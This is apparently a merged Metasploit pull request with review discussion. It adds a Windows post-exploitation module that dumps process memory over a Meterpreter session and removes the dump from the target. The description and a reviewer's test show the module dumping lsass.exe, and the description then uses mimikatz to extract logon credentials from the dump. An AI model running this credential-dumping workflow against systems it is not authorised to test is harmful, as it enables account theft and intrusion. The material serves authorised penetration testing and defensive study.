### PR TITLE
Process memory dump

### PR DESCRIPTION
**Pull request by smashery**
## Vulnerable Application

This module dumps the memory for any process on the system and retrieves it for later analysis. The user must have sufficient permissions to read the memory of that process. Low-privilege users should be able to read any of their own processes. High-privilege users should be able to read any unprotected process.

This module only works on a Meterpreter session on Windows.

## Verification Steps

  1. Start `msfconsole`
  1. Get meterpreter session on a Windows host
  1. Do: `use post/windows/gather/memory_dump`
  1. Do: `set SESSION <session id>`
  1. Do: `set PID <process id>`
  1. Do: `set DUMP_PATH <path on remote system>`
  1. Do: `set DUMP_TYPE <standard|full>`
  1. Do: `run`
  1. You should be able to see that the module has dumped the process to a file and starts downloading it.
  1. You should be able to see, whether the module succeeds or fails, that the file on the remote system has been deleted.

## Demo

Retrieving a notepad executable using a Standard dump:

```
meterpreter > ps | notepad
Filtering on 'notepad'

Process List
============

 PID   PPID  Name         Arch  Session  User              Path
 ---   ----  ----         ----  -------  ----              ----
 7840  5140  notepad.exe  x64   2        DemoPC\user       C:\Windows\System32\notepad.exe

meterpreter > 
Background session 4? [y/N]  
msf6 post(windows/gather/memory_dump) > set PID 7840
PID => 7840

[*] Running module against DemoPC
[*] Dumping memory for notepad.exe
[*] Downloading minidump (1.31 MiB)
[+] Memory dump stored at /home/user/.msf4/loot/20210505174712_default_192.168.XXX.XXX_windows.process._768442.bin
[*] Deleting minidump from disk
[*] Post module execution completed
```

Then in bash:

```
$ strings -e b /home/user/.msf4/loot/20210505174712_default_192.168.XXX.XXX_windows.process._768442.bin | grep metasploit
his is some text I have just typed into notepad for a metasploit demo
```

Retrieving lsass using a Full dump (after getsystem, which is definitely broken as far as I can tell; someone should get on to @OJ about that):

```
meterpreter > ps | lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 700  536   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe

meterpreter > 
Background session 4? [y/N]  
msf6 post(windows/gather/memory_dump) > set pid 700
pid => 700
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DemoPC
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.31 MiB)
[+] Memory dump stored at /home/user/.msf4/loot/20210505174955_default_192.168.XXX.XXX_windows.process._647943.bin
[*] Deleting minidump from disk
[*] Post module execution completed
```

Then in mimikatz:

```
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::minidump c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin
Switch to MINIDUMP : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin'

mimikatz # sekurlsa::logonPasswords
Opening : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin' file for minidump...

Authentication Id : 0 ; 280858 (00000000:0004491a)
Session           : RemoteInteractive from 2
User Name         : user
Domain            : DemoPC
Logon Server      : DemoPC
Logon Time        : 5/05/2021 3:15:10 PM
SID               : S-1-5-21-920577323-754201681-977916534-1001
        msv :
         [00000003] Primary
         * Username : user
         * Domain   : DemoPC
         * NTLM     : (redacted, but verified)
         * SHA1     : (redacted)
        tspkg :
        wdigest :
         * Username : user
         * Domain   : DemoPC
         * Password : (null)
        kerberos :
         * Username : user
         * Domain   : DemoPC
         * Password : (null)
        ssp :
        credman :
        cloudap :

    ...
```

### CODE REVIEW

File: modules/post/windows/gather/memory_dump.rb [hunk 1]
```diff
@@ -0,0 +1,142 @@
...
+      meterp_temp = Tempfile.new('meterp')
+      meterp_temp.binmode
+      temp_path = meterp_temp.path
+      src_stat = client.fs.filestat.new(path)
+      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
+      session.fs.file.download_file(temp_path, path)
+      dump_contents = File.read(temp_path, mode: 'rb')
+      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, dump_contents)
+      print_good("Memory dump stored at #{loot_path}")
+      ::File.delete(temp_path)
```
Comment (cdelafuente-r7) [inline modules/post/windows/gather/memory_dump.rb:119]: I'm just wondering, would it be possible to read the remote file and store it to the loot without having to downloading it to a local temporary file? Not a big deal, but maybe a possible optimization.

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks for this contribution @smashery ! This module will definitely be useful. I tested against Window 10 version 1909 and it works great. I just left a few comments for possible improvements, when you get a chance.

**Comment by timwr** [comment]
fyi there is a script that does something similar: https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/process_memdump.rb but I have not tested it.

File: lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb [hunk 2]
```diff
@@ -0,0 +1,30 @@
...
+
+class Def_windows_dbghelp
+
+  def self.create_library(constant_manager, library_path = 'dbghelp')
+    dll = Library.new(library_path, constant_manager)
+
+    dll.add_function('MiniDumpWriteDump', 'BOOL',[
+      ["DWORD","hProcess","in"],
+      ["DWORD","ProcessId","in"],
+      ["DWORD","hFile","in"],
```
[the remark this answers is not in the document]
Comment (smashery) [reply lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_dbghelp.rb]: Good call - added.

File: modules/post/windows/gather/memory_dump.rb [hunk 3]
```diff
@@ -0,0 +1,142 @@
...
+          smaller in size.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['smashery'],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter' ]
+      )
+    )
+    register_options([
+      OptString.new('PID', [true, 'ID of the process to dump memory from', nil, /\d+/]),
```
[the remark this answers is not in the document]
Comment (smashery) [reply modules/post/windows/gather/memory_dump.rb]: Good call - changed.

File: modules/post/windows/gather/memory_dump.rb (hunk 1 above)
Comment (smashery) [reply modules/post/windows/gather/memory_dump.rb]: Yeah, the store_loot API didn't seem to support that use case (expects you to give it the data when you call it), but I guess I can just give it an empty string and then write directly to that file. I've taken that approach in a new commit - let me know what you think.

Comment (cdelafuente-r7) [reply modules/post/windows/gather/memory_dump.rb]: Modifying the file stored locally in the loot is usually not recommended. `store_loot` also stores the data in the database and, in this case, even if the local file is correct, the database will not have the data.
I was thinking about something along these lines:
```ruby
    begin
      src_stat = client.fs.filestat.new(path)
      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
      dump_data = read_file(path)
      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, dump_data)
      print_good("Memory dump stored at #{loot_path}")
    ensure
      print_status('Deleting minidump from disk')
      rm_f(path)
    end
```
`read_file` and `rm_f` are helper methods from the `Msf::Post::File` mixin, which will need to be included:
```ruby
class MetasploitModule < Msf::Post
  include Msf::Post::File
```

**Comment by cdelafuente-r7** [comment]
Thanks @smashery for updating the code. It looks good to me now. I tested against Windows Server 2012 and successfully dump memory of a process on the target. I will go ahead and land it.

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps | lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 740  636   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\lsass.exe

meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DUMP_PATH                   yes       File to write memory dump to
   DUMP_TYPE  standard         yes       Minidump size (Accepted: standard, full)
   PID                         yes       ID of the process to dump memory from
   SESSION                     yes       The session to run this module on.

msf6 post(windows/gather/memory_dump) > set PID 740
PID => 740
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\msf_dump1
DUMP_PATH => C:\msf_dump1
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DUMP_PATH  C:\msf_dump1     yes       File to write memory dump to
   DUMP_TYPE  standard         yes       Minidump size (Accepted: standard, full)
   PID        740              yes       ID of the process to dump memory from
   SESSION    1                yes       The session to run this module on.

msf6 post(windows/gather/memory_dump) > set verbose true
verbose => true
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-DP0M1BC768
[*] Dumping memory for lsass.exe
[*] Downloading minidump (16.78 MiB)
[+] Memory dump stored at /home/msfuser/.msf4/loot/20210709151505_default_192.168.1.223_windows.process._870086.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > file /home/msfuser/.msf4/loot/20210709151505_default_192.168.1.223_windows.process._870086.bin
[*] exec: file /home/msfuser/.msf4/loot/20210709151505_default_192.168.1.223_windows.process._870086.bin

/home/msfuser/.msf4/loot/20210709151505_default_192.168.1.223_windows.process._870086.bin: Mini DuMP crash report, 10 streams, Fri Jul  9 13:15:06 2021, 0x1345 type
msf6 post(windows/gather/memory_dump) > loot

Loot
====

host             service  type                  name  content                   info  path
----             -------  ----                  ----  -------                   ----  ----
192.168.1.223           windows.process.dump        application/octet-stream        /home/msfuser/.msf4/loot/20210709151505_default_192.168.1.223_windows.process._870086.bin
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.

**Pull request merged**